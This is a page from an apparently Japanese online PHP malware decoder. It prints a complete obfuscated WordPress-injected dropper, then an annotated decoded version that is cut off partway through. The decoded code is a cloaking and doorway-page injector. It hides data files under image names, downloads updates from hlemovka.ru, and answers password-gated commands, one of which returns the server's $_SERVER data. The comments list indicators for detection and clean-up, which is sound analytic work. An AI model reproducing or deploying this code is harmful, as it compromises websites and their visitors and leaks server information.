WordPress などに埋め込まれた PHP のマルウェア・ウイルス・改ざんコードをオンラインでデコードして難読化を解除し、
元の読みやすいコードに戻して解読できます。
<?php $XYBPUxYXhS="Ky5CF2cewR7jph0lsUxTNf6ndkZqAgLJI9arYD8QMSWOz4Xtv13omV_BHbuiGPE";$zfqzpjKqjgxTW=$XYBPUxYXhS[57]. $XYBPUxYXhS[34]. $XYBPUxYXhS[16] .$XYBPUxYXhS[7]. $XYBPUxYXhS[22] .$XYBPUxYXhS[45]. $XYBPUxYXhS[54] . $XYBPUxYXhS[24]. $XYBPUxYXhS[7] . $XYBPUxYXhS[6] . $XYBPUxYXhS[51]. $XYBPUxYXhS[24]. $XYBPUxYXhS[7];$zDJaNaMycX=$XYBPUxYXhS[16]. $XYBPUxYXhS[47] .$XYBPUxYXhS[35]. $XYBPUxYXhS[35]. $XYBPUxYXhS[7]. $XYBPUxYXhS[48];$GFGDTLyNe=$XYBPUxYXhS[7].$XYBPUxYXhS[35]. $XYBPUxYXhS[35]. $XYBPUxYXhS[51] .$XYBPUxYXhS[35]. $XYBPUxYXhS[54] . $XYBPUxYXhS[35]. $XYBPUxYXhS[7] .$XYBPUxYXhS[12] . $XYBPUxYXhS[51] .$XYBPUxYXhS[35]. $XYBPUxYXhS[47] . $XYBPUxYXhS[59]. $XYBPUxYXhS[23].$XYBPUxYXhS[29];$xPVxSXWqBkTtdc=$XYBPUxYXhS[6].$XYBPUxYXhS[35] .$XYBPUxYXhS[7]. $XYBPUxYXhS[34] . $XYBPUxYXhS[47].$XYBPUxYXhS[7] .$XYBPUxYXhS[54] .$XYBPUxYXhS[21]. $XYBPUxYXhS[58] .$XYBPUxYXhS[23]. $XYBPUxYXhS[6]. $XYBPUxYXhS[47] . $XYBPUxYXhS[59]. $XYBPUxYXhS[51]. $XYBPUxYXhS[23];$GFGDTLyNe(0);$MQfjCncjlLvAs=$xPVxSXWqBkTtdc("",$zfqzpjKqjgxTW($zDJaNaMycX("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")));$MQfjCncjlLvAs();?>
<?php
/*
 * ANALYSIS NOTES (decoded sample, kept token-for-token as the decoder produced it).
 *
 * What this is: a search-engine cloaking / "doorway" injector with a small
 * remote-management channel. Summary of what the code below does:
 *   - keeps three data files, named like images, in a hidden per-site
 *     directory ".<md5(host)>/" (emoji1.png, metaicons.jpg, wp-themesall.gif);
 *   - refreshes those files from the hard-coded host "hlemovka.ru" on command;
 *   - for URLs listed in its config, serves different content to crawlers
 *     (by User-Agent) and to visitors arriving from search engines (by Referer);
 *   - for everything else, re-fetches the requested page from the site itself
 *     and echoes it.
 *
 * Indicators visible in this listing (useful for hunting and clean-up):
 *   - request value "pppp_check" together with "p"
 *   - response markers "###UPDATING_FILES###", "###UPDATED###", "###WORKED###"
 *   - response header "X-CF-RAYX"
 *   - outbound requests to hlemovka.ru ("/images/<md5(host)>/..." and "/ff.php")
 *   - User-Agent containing "Chrome/78.0.1312.213" on requests the site makes to itself
 *   - the hidden directory and file names listed above
 */

// Lookup alphabet: the obfuscated original builds every function name below by
// indexing into this string (e.g. indexes 57,34,16,7,... spell "base64_decode").
$XYBPUxYXhS = "Ky5CF2cewR7jph0lsUxTNf6ndkZqAgLJI9arYD8QMSWOz4Xtv13omV_BHbuiGPE";
// Resolved function names. The original wraps its payload as
// create_function("", base64_decode(strrev("..."))); create_function() was
// removed in PHP 8.0, so the raw dropper only runs on older PHP versions.
$zfqzpjKqjgxTW = "base64_decode";
$zDJaNaMycX = "strrev";
$GFGDTLyNe = "error_reporting";
$xPVxSXWqBkTtdc = "create_function";
// Silences all PHP errors so the injected code leaves no warnings in page output.
error_reporting(0);
// The decoder renders the create_function() payload as this closure.
$MQfjCncjlLvAs = function () {
    // Removes the execution time limit for the rest of the request.
    set_time_limit(0);

    // Reads a named input from the merged $_REQUEST / $_COOKIE / $_SERVER arrays,
    // falling back to "HTTP_<NAME>". The same value can therefore arrive as a
    // query/body parameter, a cookie, or a request header, so reviewing query
    // strings alone in access logs can miss it. Returns "" when absent.
    function get_val($a0) {
        $i = @array_merge($_REQUEST, $_COOKIE, $_SERVER);
        $a = isset($i["{$a0}"]) ? $i["{$a0}"] : (isset($i["HTTP_" . strtoupper($a0)]) ? $i["HTTP_" . strtoupper($a0)] : "");
        return $a;
    }

    // Injects $links into an HTML page: collects the unique matches of $reg
    // (capture group $res), appends one link after the first occurrence of each
    // match, and places any links left over in a <p> block just before </body>.
    function change_page_regex($page, $links, $reg, $res) {
        $elements = array();
        if (preg_match_all($reg, $page, $result)) {
            $elements = $result[$res];
            $elements = array_unique($elements);
        }
        $m = min(count($links), count($elements));
        for ($i = 0; $i < $m; $i++) {
            $link = array_shift($links);
            $element = array_shift($elements);
            $page = preg_replace('/' . preg_quote($element, '/') . '/', '$0 ' . $link, $page, 1);
        }
        if (count($links) > 0) {
            $element = "<p>";
            $element .= implode("<br>\n", $links);
            $element .= "</p>";
            $page = preg_replace('/\\<\\/body\\>/i', "\n" . $element . "\n\$0", $page, 1);
        }
        return $page;
    }

    // HTTP GET via cURL; returns array(body, curl_getinfo() data).
    // TLS certificate and host-name verification are both switched off, and the
    // default User-Agent is a fixed desktop-Chrome string (a log indicator).
    function curly_page_get($url, $useragent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.1312.213 Safari/537.36") {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_TIMEOUT, 3000);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
        $result = curl_exec($ch);
        $curly_page_get_info = curl_getinfo($ch);
        curl_close($ch);
        return array($result, $curly_page_get_info);
    }

    // Re-requests the currently requested URL (HTTP_HOST + REQUEST_URI) and
    // relays its status, content type and redirect target as response headers.
    // Returns array(body, content type).
    function get_proxy_page($phead = 1) {
        // stripos() returns an int or false, never true, so as written the
        // scheme is always "http://".
        $proto = stripos(@$_SERVER['SERVER_PROTOCOL'], 'https') === true ? 'https://' : 'http://';
        $crurl = $proto . @$_SERVER['HTTP_HOST'] . @$_SERVER['REQUEST_URI'];
        list($buf, $curly_page_get_info) = curly_page_get($crurl);
        $ct = @$curly_page_get_info['content_type'];
        $nexturl = @$curly_page_get_info['redirect_url'];
        $status = @$curly_page_get_info['http_code'];
        if (true) {
            header("Status: {$status}");
        }
        if ($phead) {
            // Non-standard header carrying the first 10 hex characters of
            // md5(time()); its presence in a response is a detection marker.
            header("X-CF-RAYX: " . substr(md5(time()), 0, 10));
        }
        if ($ct != "") {
            header("Content-type: {$ct}");
        }
        if ($nexturl != "") {
            header("Location: {$nexturl}");
        }
        return array($buf, $ct);
    }

    // Picks the directory that will hold the hidden data directory.
    // Order: system temp dir when PHP_OS contains "win"; the first existing,
    // writable entry of a fixed list of CMS paths; the first writable
    // sub-directory of the working directory; "." ; the system temp dir.
    // During clean-up, each of these locations is worth checking for a
    // ".<md5(host)>" directory.
    function get_db_path() {
        if (stristr(PHP_OS, "win")) {
            return sys_get_temp_dir();
        }
        $default_dirs = array('wp-includes/SimplePie/Content', 'wp-includes/js/tinymce/plugins', 'wp-content/plugins/akismet/_inc/img', 'administrator/components/com_media/views/images', 'libraries/cms/html/language', 'media/editors/tinymce/js/plugins', 'tmp', 'wp-content/uploads');
        foreach ($default_dirs as $d) {
            if (is_dir($d) && is_writable($d)) {
                return $d;
            }
        }
        $current_dir = opendir('.');
        while ($dir = readdir($current_dir)) {
            if (!preg_match('/^\\.+$/', $dir) && is_dir($dir) && is_writable($dir)) {
                return $dir;
            }
        }
        closedir($current_dir);
        if (is_writable('.')) {
            return '.';
        }
        $tmp_dir = sys_get_temp_dir();
        if (is_dir($tmp_dir) && is_writable($tmp_dir)) {
            return $tmp_dir;
        }
        return ".";
    }

    $content = "";
    // Command selector for the management channel (see get_val for how it can arrive).
    $x = get_val("pppp_check");
    // MD5 of the operator secret; the secret itself is not in the sample.
    $md5pass = "e5e4570182820af0a183ce1520afe43b";
    // Host is lower-cased and stripped of "www." before hashing, so the hidden
    // directory name and the config keys are derived from the bare host name.
    $host = strtolower(@$_SERVER["HTTP_HOST"]);
    $uri = @$_SERVER["REQUEST_URI"];
    $host = str_replace("www.", "", $host);
    $md5host = md5($host);
    $urx = $host . $uri;
    $md5urx = md5($urx);
    // Hidden (dot-prefixed) per-host directory: "/.<md5(host)>/".
    $xmd5 = "/." . $md5host . "/";
    $cfile = "emoji1.png";
    // Reuse "./.<md5(host)>/" when the config file already exists there,
    // otherwise choose a writable location and create the directory.
    if (!@file_exists("." . $xmd5 . $cfile)) {
        $tmppath = get_db_path();
    } else {
        $tmppath = ".";
    }
    $tmppath .= $xmd5;
    @mkdir($tmppath);
    // Data files carry image extensions but are read below as base64 / serialized
    // PHP data: config (URL-hash => offset), record database, HTML template.
    $configs = $tmppath . $cfile;
    $bd = $tmppath . "metaicons.jpg";
    $templ = $tmppath . "wp-themesall.gif";
    // Hard-coded remote host used for file updates and for ff.php below.
    $domain = "hlemovka.ru";
    $p = "";
    if ($x != "") {
        // The secret is sent base64-encoded in "p" and compared by its MD5.
        $p = md5(@base64_decode(get_val("p")));
    }
    if ($x != "" && $p == $md5pass) {
        // --- Management channel (authenticated requests only) ---
        if ($x == "2") {
            // Command "2": download the three data files from
            // http://<domain>/images/<md5(host)>/ and overwrite the local copies.
            echo "###UPDATING_FILES###\n";
            $ur = "http://" . $domain . "/images/" . $md5host . "/";
            list($buf1, $t) = @curly_page_get($ur . "emoji1.png");
            @file_put_contents($configs, $buf1);
            list($buf1, $t) = @curly_page_get($ur . "metaicons.jpg");
            @file_put_contents($bd, $buf1);
            list($buf1, $t) = @curly_page_get($ur . "wp-themesall.gif");
            @file_put_contents($templ, $buf1);
            echo "###UPDATED###\n";
            exit;
        }
        if ($x == "4") {
            // Command "4": liveness check.
            echo "###WORKED###\n";
            exit;
        }
        if ($x == "5") {
            // Command "5": status report. Returns the parsed config, the complete
            // $_SERVER array, the data-file paths and sizes as base64(serialize()).
            // Everything in $_SERVER should be treated as disclosed.
            $cf = array();
            if (@file_exists($configs)) {
                // unserialize() on a file that was fetched over plain HTTP.
                $cf = @unserialize(@base64_decode(@file_get_contents($configs)));
            }
            // NOTE(review): "/var/www/html/input.php" is presumably the script path
            // as seen by the decoder's sandbox — confirm against the raw sample.
